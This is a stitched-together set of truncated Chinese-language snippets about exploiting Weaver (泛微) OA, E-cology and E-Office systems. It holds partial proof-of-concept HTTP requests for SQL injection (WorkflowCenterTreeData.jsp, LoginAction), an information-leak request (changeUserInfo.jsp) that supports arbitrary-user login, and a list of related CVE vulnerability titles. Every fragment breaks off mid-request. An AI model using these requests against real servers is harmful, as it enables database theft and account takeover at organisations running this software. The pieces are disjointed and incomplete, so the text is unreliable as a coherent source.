公众号内回复“泛微环境” 0x04 漏洞利用 找到oracle数据库的泛微OA系统后直接使用Poc(已公开) 如果不存在漏洞,则显示结果如下 如果漏洞存在,则会直接回显很多数据 简洁版Poc如下:(勿用于非法途径) 代码语言:javascript 复制 POST/mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333HTTP/1.1Host:i...
任意用户登录漏洞的利用前提是,需要已知一个存在于HrmResource表中的loginid。 第一种信息泄露利用方式 /mobile/plugin/changeUserInfo.jsp文件查询时使用了%,可以模糊匹配mobile,当查询出的结果条数为0时,返回{"status":"-1"}。 GET /mobile/plugin/changeUserInfo.jsp?type=getLoginid&mobile=1234 HTTP/1.1Host:...
WeaverOA_V8_Sqlinjection漏洞 [+]泛微E-Office9文件上传漏洞 CVE-2023-2648 [+]泛微 E-Office 任意文件上传漏洞(CVE-2023-2523) [+]泛微 ShowDocsImage SQL注入漏洞 [+]泛微E-Cology XXE漏洞(QVD-2023-16177) [+]泛微OA E-Cology V9 browser.jsp SQL注入漏洞 [+]泛微 e-cology ofsLogin任意用户登录漏洞...
/mobile/plugin/PreDownload.jsp url sql拼接未过滤 缺陷编号:wooyun-2015-0132258 漏洞标题:泛微OA系统存在SQL注入漏洞(附测试脚本) /ServiceAction/com.eweaver.base.security.servlet.LoginAction?action=getLabelNameByKeyId&keywordid=402881e43c2385f6013c2385f6720002&language=zh_CN&labelParams= //keywordid Or...